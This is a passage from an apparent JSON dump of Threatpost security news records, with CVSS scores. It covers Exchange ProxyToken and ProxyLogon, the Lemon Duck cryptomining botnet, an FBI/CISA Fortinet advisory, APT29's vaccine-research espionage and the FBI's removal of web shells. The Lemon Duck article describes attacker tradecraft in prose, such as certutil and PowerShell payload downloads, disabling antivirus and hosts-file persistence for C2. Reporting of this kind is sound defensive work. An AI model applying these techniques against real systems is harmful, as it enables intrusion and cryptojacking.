compromise.\n\nThe ProxyToken revelation comes after [the disclosure of](<https://threatpost.com/attackers-target-proxylogon-cryptojacker/165418/>) ProxyLogon in early March; that\u2019s an exploit chain comprised of four Exchange flaws (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065), which together create a pre-authentication remote code execution (RCE) exploit. Attackers can take over unpatched servers without knowing any valid account credentials, giving them access to email communications and the opportunity to install a web shell for further exploitation within the environment. ProxyLogon was weaponized in [wide-scale attacks](<https://threatpost.com/fbi-proxylogon-web-shells/165400/>) throughout the spring.\n\n_**Check out our free **_[_**upcoming live and on-demand webinar events**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-30T17:31:06", "type": "threatpost", "title": "Microsoft Exchange 'ProxyToken' Bug Allows Email Snooping", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-33766"], "modified": "2021-08-30T17:31:06", "id": "THREATPOST:9AF5E0BBCEF3F8F871ED50F3A8A604A9", "href": "https://threatpost.com/microsoft-exchange-proxytoken-email/169030/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-05-11T06:29:15", "description": "The Lemon Duck cryptocurrency-mining botnet has added the [ProxyLogon group of exploits](<https://threatpost.com/fbi-proxylogon-web-shells/165400/>) to its bag of tricks, targeting Microsoft Exchange servers.\n\nThat\u2019s according to researchers at Cisco Talos, who said that the cybercrime group behind Lemon Duck has also added the Cobalt Strike attack framework into its malware toolkit and has beefed up anti-detection capabilities. On the latter front, it\u2019s using fake domains on East Asian top-level domains (TLDs) to hide command-and-control (C2) infrastructure.\n\n[](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)\n\nJoin Threatpost for \u201c[Fortifying Your Business Against Ransomware, DDoS & Cryptojacking Attacks](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)\u201d a LIVE roundtable event on Wednesday, May 12 at 2:00 PM EDT for this FREE webinar sponsored by Zoho ManageEngine.\n\nLemon Duck targets victims\u2019 computer resources to mine the Monero virtual currency, with self-propagating capabilities and a modular framework that allows it to infect additional systems that become part of the botnet. It has been active since at least the end of December 2018, and Cisco Talos calls it \u201cone of the more complex\u201d mining botnets, with several interesting tricks up its sleeve.\n\nFor instance, Lemon Duck has at least 12 different initial-infection vectors \u2013 more than most malware, with Proxylogon exploits only the latest addition. Its existing capabilities ranged from Server Message Block (SMB) and Remote Desktop Protocol (RDP) password brute-forcing; targeting the RDP BlueKeep flaw (CVE-2019-0708) in Windows machines; [targeting internet-of-things devices](<https://threatpost.com/lemon-duck-malware-targets-iot/152596/>) with weak or default passwords; and exploiting vulnerabilities in Redis (an open-source, in-memory data structure store used as a database, cache and message broker) and YARN Hadoop (a resource-management and job-scheduling technology) in Linux machines.\n\n\u201cSince April 2021, Cisco Talos has observed updated infrastructure and new components associated with the Lemon Duck that target unpatched Microsoft Exchange Servers and attempt to download and execute payloads for Cobalt Strike DNS beacons,\u201d according to [an analysis](<https://blog.talosintelligence.com/2021/05/lemon-duck-spreads-wings.html>) released Friday.\n\nCisco Talos researchers [previously observed](<https://threatpost.com/lemon-duck-cryptocurrency-botnet/160046/>) an increase in DNS requests connected with Lemon Duck\u2019s C2 and mining servers last August, with the attacks mainly targeting Egypt, India, Iran, the Philippines and Vietnam. In the latest rash of attacks, which began in April, the group has changed up its geographic targets to focus primarily on North America, followed by Europe and Southeast Asia, and a handful of victims in Africa and South America.\n\n## **Targeting Exchange Servers with Monero-Mining**\n\nProxyLogon consists of four flaws (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065) that can be chained together to create a pre-authentication remote code execution (RCE) exploit \u2013 meaning that attackers can take over servers without knowing any valid account credentials. This gives them access to email communications and the opportunity to install a web shell for further exploitation within the environment, such as the deployment of ransomware.\n\nThe highly publicized exploit chain suffered a barrage of attacks from advanced persistent threat (APT) groups to infect systems with everything from ransomware to info-stealers, and now financially motivated groups are getting in on the action too.\n\nIn Lemon Duck\u2019s case, once the Exchange servers are compromised, it executes various system commands using the Windows Control Manager (sc.exe), including copying two .ASPX files named \u201cwanlins.aspx\u201d and \u201cwanlin.aspx.\u201d\n\n\u201cThese files are likely web shells and were copied from C:\\inetpub\\wwwroot\\aspnet_client\\, a known directory where a majority of the web shells were initially observed following Microsoft\u2019s release of details related to Hafnium activity,\u201d according to the research.\n\nNext, Cisco Talos researchers observed the echo command being used to write code associated with a web shell into the previously created ASPX files, and the modification of the Windows registry to enable RDP access to the system.\n\n\u201cIn this case, several characteristics matched portions of code associated with known China Chopper variants identified days after the Exchange Server vulnerabilities were publicized,\u201d they noted.\n\nOther interesting aspects of the latest campaign include the fact that Lemon Duck executes a PowerShell script that downloads and executes an additional malware payload, \u201csyspstem.dat,\u201d which includes a \u201ckiller\u201d module which contains a hardcoded list of competing cryptocurrency miners that Lemon Duck disables. The module is run every 50 minutes.\n\nAlso, the malware is now leveraging Certutil to download and execute two new malicious PowerShell scripts, researchers said. Certutil is a native Windows command-line program that is installed as part of Certificate Services. It is used to verify and dump Certificate Authority (CA) information, get and publish new certificate revocation lists, and so on.\n\nOne of the PowerShell scripts, named \u201cdn.ps1,\u201d attempts to uninstall multiple antivirus products, and also retrieves a Cobalt Strike payload.\n\n## **Cobalt Strike Added to the Mix**\n\n[Cobalt Strike is a penetration-testing tool](<https://threatpost.com/cobalt-ulster-strikes-again-with-new-forelord-malware/153418/>) that\u2019s commercially available. It sends out beacons to detect network vulnerabilities. When used for its intended purpose, it [simulates an attack](<https://www.cobaltstrike.com/features>). Threat actors have since figured out how to [turn it against networks](<https://threatpost.com/apt29-re-emerges-after-2-years-with-widespread-espionage-campaign/139246/>) to exfiltrate data, deliver malware and create fake C2 profiles that look legitimate and avoid detection.\n\nLemon Duck\u2019s Cobalt Strike payload is configured as a Windows DNS beacon and attempts to communicate with the C2 server using a DNS-based covert channel, researchers noted. The beacon then communicates with this specific subdomain to transmit encoded data via DNS A record query requests.\n\n\u201cThis represents a new TTP for Lemon Duck, and is another example of their reliance [on offensive security tools (OSTs)](<https://threatpost.com/malicious-software-infrastructure-easier-deploy/162913/>), including Powersploit\u2019s reflective loader and a modified Mimikatz, which are already included as additional modules and components of Lemon Duck and used throughout the typical attack lifecycle,\u201d according to Cisco Talos.\n\n## **Lemon Duck\u2019s Fresh Anti-Detection Tricks**\n\nWhile Lemon Duck casts a wide net in terms of victimology, it has been exclusively using websites within the TLDs for China (\u201c.cn\u201d), Japan (\u201c.jp\u201d) and South Korea (\u201c.kr\u201d) for its C2 activities since February, rather than the more familiar \u201c.com\u201d or \u201c.net.\u201d\n\n\u201cConsidering these [TLDs] are most commonly used for websites in their respective countries and languages\u2026this may allow the threat actor to more effectively hide C2 communications among other web traffic present in victim environments,\u201d according to Cisco Talos. \u201cDue to the prevalence of domains using these [TLDs], web traffic to the domains\u2026may be more easily attributed as noise to victims within these countries.\u201d\n\nDuring the Lemon Duck infection process, PowerShell is used to invoke the \u201cGetHostAddresses\u201d method from the .NET runtime class \u201cNet.Dns\u201d to obtain the current IP address for an attacker-controlled domain, researchers explained.\n\n\u201cThis IP address is combined with a fake hostname hardcoded into the PowerShell command and written as an entry to the Windows hosts file,\u201d they said. \u201cThis mechanism allows name resolution to continue even if DNS-based security controls are later deployed, as the translation is now recorded locally and future resolution requests no longer rely upon upstream infrastructure such as DNS servers. This may allow the adversary to achieve longer-term persistence once operational in victim environments.\u201d\n\n## **Cryptojackers Take Notice of ProxyLogon**\n\nLemon Duck is not the first cryptomining malware to add ProxyLogon to its arsenal. For instance, another cryptojacking group [was seen in mid-April](<https://threatpost.com/attackers-target-proxylogon-cryptojacker/165418/>) doing the same thing.\n\nThat bad code was fairly simple, but also in mid-April a heretofore little-seen Monero-mining botnet [dubbed Prometei](<https://threatpost.com/prometei-botnet-apt-attacks/165574/>) began exploiting two of the Microsoft Exchange vulnerabilities in ProxyLogon. This malware is also highly complex and sophisticated, Cybereason researchers noted at the time. While cryptojacking is its current game, researchers warned that Prometei (the Russian word for Prometheus, the Titan god of fire from Greek mythology) gives attackers complete control over infected machines, which makes it capable of doing a wide range of damage.\n\nThe threat will likely continue to evolve, Cisco Talos researchers said. They also observed domains linked to Lemon Duck and another cryptocurrency miner, DLTMiner, used in relation to Microsoft Exchange attacks where ransomware was also deployed.\n\n\u201cAt this time, there doesn\u2019t appear to be a link between the Lemon Duck components observed there and the reported ransomware (TeslaRVNG2),\u201d according to the analysis. \u201cThis suggests that given the nature of the vulnerabilities targeted, we are likely to continue to observe a range of malicious activities in parallel, using similar exploitation techniques and infection vectors to compromise systems. In some cases, attackers may take advantage of artifacts left in place from prior compromises, making distinction more difficult.\u201d\n\nMeanwhile, it\u2019s clear that the threat actor behind Lemon Duck is continuously evolving its approach to maximize the ability to achieve its mission objectives, researchers noted.\n\n\u201cLemon Duck continues to launch campaigns against systems around the world, attempting to leverage infected systems to mine cryptocurrency and generate revenue for the adversary behind this botnet,\u201d they concluded. \u201cThe use of new tools like Cobalt Strike, as well as the implementation of additional obfuscation techniques throughout the attack lifecycle, may enable them to operate more effectively for longer periods within victim environments. \u2026 Organizations should remain vigilant against this threat, as it will likely continue to evolve.\u201d\n\n**Join Threatpost for \u201c**[**Fortifying Your Business Against Ransomware, DDoS & Cryptojacking Attacks**](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)**\u201d \u2013 a LIVE roundtable event on**[** Wed, May 12 at 2:00 PM EDT**](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinarhttps://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)**. Sponsored by Zoho ManageEngine, Threatpost host Becky Bracken moderates an expert panel discussing best defense strategies for these 2021 threats. Questions and LIVE audience participation encouraged. Join the lively discussion and [Register HERE](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>) for free. **\n", "cvss3": {}, "published": "2021-05-10T17:37:44", "type": "threatpost", "title": "Lemon Duck Cryptojacking Botnet Changes Up Tactics", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-0708", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-05-10T17:37:44", "id": "THREATPOST:1084DB580B431A6B8428C25B78E05C88", "href": "https://threatpost.com/lemon-duck-cryptojacking-botnet-tactics/165986/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-04-05T19:26:27", "description": "The FBI and the Cybersecurity and Infrastructure Security Agency are warning that advanced persistent threat (APT) nation-state actors are actively exploiting known security vulnerabilities in the Fortinet FortiOS cybersecurity operating system, affecting the company\u2019s SSL VPN products.\n\nAccording to an alert issued Friday by the FBI and CISA, cyberattackers are scanning devices on ports 4443, 8443 and 10443, looking for unpatched Fortinet security implementations. Specifically, APTs are exploiting CVE-2018-13379, CVE-2019-5591 and CVE-2020-12812.\n\n\u201cIt is likely that the APT actors are scanning for these vulnerabilities to gain access to multiple government, commercial and technology services networks,\u201d according to [the alert](<https://us-cert.cisa.gov/ncas/current-activity/2021/04/02/fbi-cisa-joint-advisory-exploitation-fortinet-fortios>). \u201cAPT actors have historically exploited critical vulnerabilities to conduct distributed denial-of-service (DDoS) attacks, ransomware attacks, structured query language (SQL) injection attacks, spear-phishing campaigns, website defacements, and disinformation campaigns.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe bug tracked as [CVE-2018-13379](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379>) is a path-traversal issue in Fortinet FortiOS, where the SSL VPN web portal allows an unauthenticated attacker to download system files via specially crafted HTTP resource requests.\n\nThe [CVE-2019-5591](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5591>) flaw is a default-configuration vulnerability in FortiOS that could allow an unauthenticated attacker on the same subnet to intercept sensitive information by impersonating the LDAP server.\n\nAnd finally, [CVE-2020-12812](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12812>) is an improper-authentication vulnerability in SSL VPN in FortiOS, which could allow a user to log in successfully without being prompted for the second factor of authentication (FortiToken) if they changed the case of their username.\n\n\u201cAttackers are increasingly targeting critical external applications \u2013 VPNs have been targeted even more this last year,\u201d said Zach Hanley, senior red team engineer at Horizon3.AI, via email. \u201cThese three vulnerabilities targeting the Fortinet VPN allow an attacker to obtain valid credentials, bypass multifactor authentication (MFA), and man-in-the-middle (MITM) authentication traffic to intercept credentials.\u201d\n\nHanley added, \u201cThe common theme here is: once they are successful, they will look just like your normal users.\u201d\n\nThe bugs are popular with cyberattackers in general, due to Fortinet\u2019s widespread footprint, researchers noted.\n\n\u201cCVE-2018-13379 is a critical vulnerability in the Fortinet FortiOS SSL VPN that has been favored by cybercriminals since exploit details became public in August 2019,\u201d Satnam Narang, staff research engineer at Tenable, said via email. \u201cIn fact, Tenable\u2019s 2020 Threat Landscape Retrospective placed it in our Top 5 Vulnerabilities of 2020 because we see threat actors continue to leverage it in the wild, well over a year after it was first disclosed.\u201d\n\nThe FBI and CISA didn\u2019t specify which APTs are mounting the recent activity.\n\n## Initial Compromise & Recon\n\nOnce exploited, the attackers are moving laterally and carrying out reconnaissance on targets, according to officials.\n\n\u201cThe APT actors may be using any or all of these CVEs to gain access to networks across multiple critical-infrastructure sectors to gain access to key networks as pre-positioning for follow-on data exfiltration or data encryption attacks,\u201d the warning explained. \u201cAPT actors may use other CVEs or common exploitation techniques\u2014such as spear-phishing\u2014to gain access to critical infrastructure networks to pre-position for follow-on attacks.\u201d\n\nThe joint cybersecurity advisory from the FBI and CISA follows last year\u2019s flurry of advisories from U.S. agencies about APT groups using unpatched vulnerabilities to target federal agencies and commercial organizations. For instance, in October [an alert went out](<https://threatpost.com/apt-groups-exploiting-flaws-in-unpatched-vpns-officials-warn/148956/>) that APTs were using flaws in outdated VPN technologies from Fortinet, Palo Alto Networks and Pulse Secure to carry out cyberattacks on targets in the United States and overseas.\n\n\u201cIt\u2019s no surprise to see additional Fortinet FortiOS vulnerabilities like CVE-2019-5591 and CVE-2020-12812 added to the list of known, but unpatched flaws being leveraged by these threat actors,\u201d said Narang. \u201cOver the last few years, SSL VPN vulnerabilities have been an attractive target for APT groups and cybercriminals alike. With the shift to remote work and the increased demand for SSL VPNs like Fortinet and others, the attack surface and available targets have expanded. Organizations should take this advisory seriously and prioritize patching their Fortinet devices immediately if they haven\u2019t done so already.\u201d\n\n## **How Can I Protect My Network from Cyberattacks? **\n\nThe FBI and CISA suggest a range of best practices to help organizations thwart these and other attacks:\n\n * Immediately patch CVEs 2018-13379, 2020-12812 and 2019-5591.\n * If FortiOS is not used by your organization, add key artifact files used by FortiOS to your organization\u2019s execution-deny list. Any attempts to install or run this program and its associated files should be prevented.\n * Regularly back up data, air-gap and password-protect backup copies offline. Ensure copies of critical data are not accessible for modification or deletion from the primary system where the data resides.\n * Implement network segmentation.\n * Require administrator credentials to install software.\n * Implement a recovery plan to restore sensitive or proprietary data from a physically separate, segmented, secure location (e.g., hard drive, storage device, the cloud).\n * Install updates/patch operating systems, software, and firmware as soon as updates/patches are released.\n * Use multifactor authentication where possible.\n * Regularly change passwords to network systems and accounts, and avoid reusing passwords for different accounts. Implement the shortest acceptable timeframe for password changes.\n * Disable unused remote access/Remote Desktop Protocol (RDP) ports and monitor remote access/RDP logs.\n * Audit user accounts with administrative privileges and configure access controls with least privilege in mind.\n * Install and regularly update antivirus and anti-malware software on all hosts.\n * Consider adding an email banner to emails received from outside your organization.\n * Disable hyperlinks in received emails.\n * Focus on awareness and training. Provide users with training on information security principles and techniques, particularly on recognizing and avoiding phishing emails.\n\n**_Check out our free _**[**_upcoming live webinar events_**](<https://threatpost.com/category/webinars/>)**_ \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community:_**\n\n * April 21: **Underground Markets: A Tour of the Dark Economy** ([Learn more and register!](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>))\n\n** **\n", "cvss3": {}, "published": "2021-04-02T19:56:57", "type": "threatpost", "title": "FBI: APTs Actively Exploiting Fortinet VPN Bugs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-13379", "CVE-2019-5591", "CVE-2020-12812", "CVE-2020-9922"], "modified": "2021-04-02T19:56:57", "id": "THREATPOST:2DFBDDFFE3121143D95705C4EA525C7A", "href": "https://threatpost.com/fbi-apts-actively-exploiting-fortinet-vpn-security-holes/165213/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-07-16T19:56:37", "description": "The advanced threat actor known as APT29 has been hard at work attempting to pilfer COVID-19 vaccine research from academic and pharmaceutical research institutions in various countries around the world, including the U.S.\n\nThat\u2019s according to a joint alert from the U.S. Department of Homeland Security (DHS), the U.K.\u2019s National Cyber Security Centre (NCSC) and Canada\u2019s Communications Security Establishment (CSE), [issued Thursday](<https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development>).\n\nThe 14-page advisory details the recent activity of Russia-linked APT29 (a.k.a. CozyBear or the Dukes), including the use of custom malware called \u201cWellMess\u201d and \u201cWellMail\u201d for data exfiltration.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThroughout 2020, APT29 has targeted various organizations involved in COVID-19 vaccine development in Canada, the United States and the United Kingdom, highly likely with the intention of stealing information and intellectual property relating to the development and testing of COVID-19 vaccines,\u201d the report noted.\n\nThis specific activity was seen starting in April, but security researchers noted that nation-state espionage targeted to coronavirus treatments and cures [has been a phenomenon all year](<https://threatpost.com/nation-backed-apts-covid-19-spy-attacks/155082/>).\n\n\u201cCOVID-19 is an existential threat to every government in the world, so it\u2019s no surprise that cyber-espionage capabilities are being used to gather intelligence on a cure,\u201d said John Hultquist, senior director of analysis at Mandiant Threat Intelligence, via email. \u201cThe organizations developing vaccines and treatments for the virus are being heavily targeted by Russian, Iranian and Chinese actors seeking a leg up on their own research. We\u2019ve also seen significant COVID-related targeting of governments that began as early as January.\u201d\n\n## **Exploits in Play**\n\nTo mount the attacks, APT29 is using exploits for known vulnerabilities to gain initial access to targets, according to the analysis, along with spearphishing to obtain authentication credentials to internet-accessible login pages for target organizations. The exploits in rotation include the recent [Citrix code-injection bug](<https://threatpost.com/citrix-bugs-allow-unauthenticated-code-injection-data-theft/157214/>) (CVE-2019-19781); a publicized [Pulse Secure VPN flaw](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>) (CVE-2019-11510); and issues in FortiGate (CVE-2018-13379) and Zimbra (CVE-2019-9670).\n\n\u201cThe group conducted basic vulnerability scanning against specific external IP addresses owned by the [targeted] organizations,\u201d according to the report. \u201cThe group then deployed public exploits against the vulnerable services identified. The group has been successful using recently published exploits to gain initial footholds.\u201d\n\nOnce a system is compromised, the group then looks to obtain additional authentication credentials to allow further access and spread laterally.\n\n## **Custom Malware**\n\nOnce established in a network, APT29 is employing homegrown malware that the NCSC is calling WellMess and WellMail, to conduct further operations on the victim\u2019s system and exfiltrate data.\n\nWellMess, first discovered in July 2018, is malware that comes in Golang or .NET versions and supports HTTP, TLS and DNS for communications.\n\nNamed after one of the function names in the malware, \u201cWellMess is a lightweight malware designed to execute arbitrary shell commands, upload and download files,\u201d according to the advisory.\n\nWellMail malware meanwhile, named after file paths containing the word \u2018mail\u2019 and the use of server port 25, is also lightweight \u2013 and is designed to run commands or scripts while communicating with a hardcoded command-and-control (C2) server.\n\n\u201cThe binary is an ELF utility written in Golang which receives a command or script to be run through the Linux shell,\u201d according to the NCSC. \u201cTo our knowledge, WellMail has not been previously named in the public domain.\u201d\n\nBoth malwares uses hard-coded client and certificate authority TLS certificates to communicate with their C2 servers.\n\n\u201cWellMess and WellMail samples contained TLS certificates with the hard-coded subjectKeyIdentifier (SKI) \u20180102030406\u2019, and used the subjects \u2018C=Tunis, O=IT\u2019 and \u2018O=GMO GlobalSign, Inc\u2019 respectively,\u201d detailed the report. \u201cThese certificates can be used to identify further malware samples and infrastructure. Servers with this GlobalSign certificate subject may be used for other functions in addition to WellMail malware communications.\u201d\n\nAPT29 is also using another malware, dubbed \u2018SoreFang\u2019 by the NCSC, which is a first-stage downloader that uses HTTP to exfiltrate victim information and download second-stage malware. It\u2019s using the same C2 infrastructure as a WellMess sample, the agencies concluded.\n\nThis sample is not a custom job: \u201cIt is likely that SoreFang targets SangFor devices. Industry reporting indicates that other actors, reportedly including [DarkHotel](<https://threatpost.com/microsoft-zero-day-actively-exploited-patch/152018/>), have also targeted SangFor devices,\u201d noted the NCSC.\n\n## **APT29: A Sporadically High-Profile Threat**\n\n[APT29](<https://attack.mitre.org/groups/G0016/>) has long been seen targeting high-value targets across the think-tank, law enforcement, media, U.S. military, imagery, transportation, pharmaceutical, national government and defense contracting sectors.\n\nThe group is is perhaps best-known for the [intrusion](<https://threatpost.com/dnc-hacked-research-on-trump-stolen/118656/>) at the Democratic National Committee ahead of the U.S. presidential election in 2016. It was also implicated in [a widespread phishing campaign](<https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/>) in November 2016, in attacks against the White House, State Department and Joint Chiefs of Staff.\n\nIt was next seen in November 2017 [executing a Tor backdoor](<https://threatpost.com/apt29-used-domain-fronting-tor-to-execute-backdoor/124582/>), and then [it reemerged](<https://threatpost.com/apt29-re-emerges-after-2-years-with-widespread-espionage-campaign/139246/>) in 2018 with a widespread espionage campaign against military, media and public-sector targets.\n\nIts history stretches back a few years though: It [was also seen](<https://threatpost.com/white-house-state-department-counted-among-cozyduke-apt-victims/112382/>) by Kaspersky Lab carrying out data-mining attacks against the White House and the Department of State in 2014.\n\nResearchers from firms [like Mandiant](<https://www.fireeye.com/current-threats/apt-groups/rpt-apt29.html>) believe APT29 to be linked to Russian government-backed operations \u2013 an assessment that the DHS and NCSC reiterated in the latest advisory, saying that it is \u201calmost certainly part of the Russian intelligence services.\u201d\n\nWhile its publicly profiled activity tends to be sporadic, APT29 is rarely at rest, according to Mandiant\u2019s Hultquist.\n\n\u201cDespite involvement in several high-profile incidents, APT29 rarely receives the same attention as other Russian actors because they tend to quietly focus on intelligence collection,\u201d he said via email. \u201cWhereas GRU actors have brazenly leaked documents and carried out destructive attacks, APT29 digs in for the long term, siphoning intelligence away from its target.\u201d\n\nThis latest case is no exception to that M.O., according to the advisory: \u201cAPT29 is likely to continue to target organizations involved in COVID-19 vaccine research and development, as they seek to answer additional intelligence questions relating to the pandemic,\u201d the agencies concluded.\n\nThat said, at least one researcher warned that the end-game of the activity might be more nefarious than simply getting a leg up on a cure.\n\n\u201cAPT29 (Cozy Bear, Office Monkeys) has successfully demonstrated the extension of nation-state power through cyber-action for more than a dozen years,\u201d Michael Daly, CTO at Raytheon Intelligence & Space, said via email. \u201cHowever, they are not focused on simple intellectual property theft. Instead, their focus is rooted in influence operations \u2013 the changing of hearts and minds to thwart and diminish the power of governments and organizations.\u201d\n\nHe added, \u201cIn the case of this breach of vaccine research centers, we should be most concerned not that someone else might also get a vaccine, but that the information will be used to undermine the confidence of the public in the safety or efficacy of the vaccines, slowing their adoption, or in some way cause their release to be delayed. The effect of such a delay would be both impactful to the health of Western populations, but also to the social stability and economic stability of the West.\u201d\n", "cvss3": {}, "published": "2020-07-16T18:05:20", "type": "threatpost", "title": "Hackers Look to Steal COVID-19 Vaccine Research", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2019-9670"], "modified": "2020-07-16T18:05:20", "id": "THREATPOST:1FB73160B6AAB2B0406816BB6A61E4CB", "href": "https://threatpost.com/state-sponsored-hackers-steal-covid-19-vaccine-research/157514/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-04-15T09:53:19", "description": "The Feds have cleared malicious web shells from hundreds of vulnerable computers in the United States that had been compromised via the now-infamous ProxyLogon Microsoft Exchange vulnerabilities.\n\nProxyLogon comprises a group of security bugs affecting on-premises versions of Microsoft Exchange Server software for email. Microsoft last month warned that the bugs were being [actively exploited](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) by the Hafnium advanced persistent threat (APT); after that, other researchers said that [10 or more additional APTs](<https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/>) were also using them.\n\nProxyLogon consists of four flaws (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065) that can be chained together to create a pre-authentication remote code execution (RCE) exploit \u2013 meaning that attackers can take over servers without knowing any valid account credentials. This gives them access to email communications and the opportunity to install a web shell for further exploitation within the environment, such as the [deployment of ransomware](<https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/>).\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nWhile patching levels have accelerated, this doesn\u2019t help already-compromised computers.\n\n\u201cMany infected system owners successfully removed the web shells from thousands of computers,\u201d explained the Department of Justice, in a [Tuesday announcement](<https://www.justice.gov/usao-sdtx/pr/justice-department-announces-court-authorized-effort-disrupt-exploitation-microsoft>). \u201cOthers appeared unable to do so, and hundreds of such web shells persisted unmitigated.\u201d\n\nThis state of affairs prompted the FBI to take action; in a court-authorized action, it issued a series of commands through the web shells to the affected servers. The commands were designed to cause the server to delete only the web shells (identified by their unique file path). It didn\u2019t notify affected organizations ahead of time, but authorities said they\u2019re sending out notices now.\n\n\u201cToday\u2019s court-authorized removal of the malicious web shells demonstrates the Department\u2019s commitment to disrupt hacking activity using all of our legal tools, not just prosecutions,\u201d said Assistant Attorney General John Demers for the DoJ\u2019s National Security Division, in the statement.\n\n## **Unilateral FBI Action Against ProxyLogon Exploits**\n\nOther technical details of the action are being kept under wraps, but Erkang Zheng, founder and CEO at JupiterOne, noted that the action is unprecedented.\n\n\u201cWhat makes this really interesting is the court ordered remote remediation of vulnerable systems,\u201d he said via email. \u201cThis is the first time that this has happened and with this as a precedent, it likely won\u2019t be the last. Many enterprises today have no idea what their infrastructure and security state looks like \u2013 visibility is a huge problem for CISOs.\u201d\n\nDirk Schrader, global vice president of security research at New Net Technologies, noted that the FBI\u2019s lack of transparency could be problematic.\n\n\u201cThere are a few critical issues in this,\u201d he told Threatpost. \u201cOne is the FBI stating the action was because these victims lack the technical ability to clear their infrastructure themselves, another is that it seems the FBI intends to delay informing the victims about the removal itself by at least a month, citing ongoing investigations as a reason.\u201d\n\nHe explained, \u201cThis can cause other issues, as the victims have no chance to investigate what kind of information has been accessed, whether additional backdoors where installed, and a range of other concerns come with this approach.\u201d\n\nMonti Knode, director of customer and partner success at Horizon3.AI, noted that the action illuminates just how dangerous the bugs are.\n\n\u201cGovernment action is always predicated by an authority to act,\u201d he said via email. \u201cBy specifically calling out \u2018protected computers\u2019 and declaring them \u2018damaged\u2019, that appears to have been enough to give the FBI a signed warrant to execute such an operation without notifying victims ahead of the operation execution. While the scale of the operation is unknown (redacted in court order), the fact that the FBI was able to execute in less than four days, and then publicly release this effort, demonstrates the potential national security risk posed by these exploited systems and the prioritized planning involved. This isn\u2019t a knee-jerk reaction.\u201d\n\nThis operation was successful in copying and removing the web shells, the FBI reported. However, organizations still need to patch if they haven\u2019t yet done so.\n\n\u201cCombined with the private sector\u2019s and other government agencies\u2019 efforts to date, including the release of detection tools and patches, we are together showing the strength that public-private partnership brings to our country\u2019s cybersecurity,\u201d Denmers said. \u201cThere\u2019s no doubt that more work remains to be done, but let there also be no doubt that the Department is committed to playing its integral and necessary role in such efforts.\u201d\n\n## New Exchange RCE Bugs and a Federal Warning\n\nThe news comes on the heels of [April Patch Tuesday](<https://threatpost.com/microsoft-april-patch-tuesday-zero-days/165393/>), in which Microsoft revealed more RCE vulnerabilities in Exchange (CVE-2021-28480 through CVE-2021-28483), which were discovered and reported by the National Security Agency. A [mandate to federal agencies](<https://cyber.dhs.gov/ed/21-02/#supplemental-direction-v2>) to patch them by Friday also went out.\n\nImmersive Labs\u2019 Kevin Breen, director of cyber-threat research, warned that weaponization of these may come faster than usual, since motivated attackers will be able to use existing concept code.\n\n\u201cThis underlines the criticality of cybersecurity now to entire nations, as well as the 